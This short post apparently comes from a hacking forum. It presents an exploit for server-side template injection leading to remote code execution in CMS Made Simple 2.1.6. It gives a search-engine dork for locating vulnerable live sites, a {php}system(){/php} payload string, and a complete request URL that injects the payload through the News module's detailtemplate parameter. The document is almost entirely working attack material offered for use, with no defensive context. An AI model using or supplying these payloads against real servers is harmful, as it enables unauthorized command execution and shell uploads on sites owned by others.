SSTI Vulnerability in CMS Made Simple RCE Upload Shell

Dork : “Powered by CMS Made Simple” 2.1.6

Exploit Check Vuln:

string:{php}echo system(%2527Command%2527);{/php}

To Make It Easier We Use Exploit Below: v For Vuln Checks

/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}echo system(%2527Command%2527);{/php}&cntnt01returnid=1

Tutorial Videos :